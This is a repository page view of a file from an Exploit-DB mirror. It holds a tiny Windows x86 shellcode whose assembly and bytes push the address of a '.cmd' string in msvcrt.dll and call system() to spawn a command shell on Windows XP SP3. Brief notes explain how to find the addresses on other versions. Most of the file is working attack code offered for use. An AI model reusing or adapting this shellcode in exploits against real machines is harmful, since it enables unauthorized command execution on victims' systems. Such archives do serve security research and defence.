bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/windows_x86/13647.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
314 B
Text
Raw Permalink Blame History

68 9D 61 F9 77 push 0x77C01345
B8 C7 93 C1 77 mov eax,msvcrt.system
FF D0 call eax
In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick.
Code will work in WinXP SP3 Pro Rus, in other versions you'd better search
the string and system(char*) address for yourself.
Coded via lord Kelvin.
Reference in a new issue View git blame Copy permalink